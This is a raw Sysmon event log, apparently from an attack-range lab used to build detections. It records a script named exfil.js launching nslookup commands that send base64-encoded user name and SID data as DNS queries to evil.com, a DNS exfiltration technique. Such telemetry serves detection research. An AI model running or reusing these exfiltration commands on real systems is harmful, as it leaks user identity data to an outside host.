14:16:46.178{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.163{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.163{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.163{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1442-000000005F02}7476C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.163{2E1864BB-17CE-629A-1242-000000005F02}79922620C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-1442-000000005F02}7476C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.177{2E1864BB-17CE-629A-1442-000000005F02}7476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-1242-000000005F02}7992C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgzyg.tmp 2>&1 10341000x8000000000000000204455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.161{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1342-000000005F02}5608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.161{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1342-000000005F02}5608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.141{2E1864BB-17CE-629A-1342-000000005F02}56087884C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1242-000000005F02}7992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.141{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1342-000000005F02}5608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.125{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1242-000000005F02}7992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.125{2E1864BB-17A1-629A-783D-000000005F02}55522872C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-1242-000000005F02}7992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.140{2E1864BB-17CE-629A-1242-000000005F02}7992C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgzyg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.125{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlltuinv.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.110{2E1864BB-17CE-629A-1042-000000005F02}24447324C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1142-000000005F02}1492C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.110{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.110{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.110{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.110{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.110{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1142-000000005F02}1492C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.110{2E1864BB-17CE-629A-0F42-000000005F02}20403736C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-1142-000000005F02}1492C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.114{2E1864BB-17CE-629A-1142-000000005F02}1492C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-0F42-000000005F02}2040C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlltuinv.tmp 2>&1 10341000x8000000000000000204435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.094{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1042-000000005F02}2444C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.094{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1042-000000005F02}2444C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.078{2E1864BB-17CE-629A-1042-000000005F02}24447324C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-0F42-000000005F02}2040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1042-000000005F02}2444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+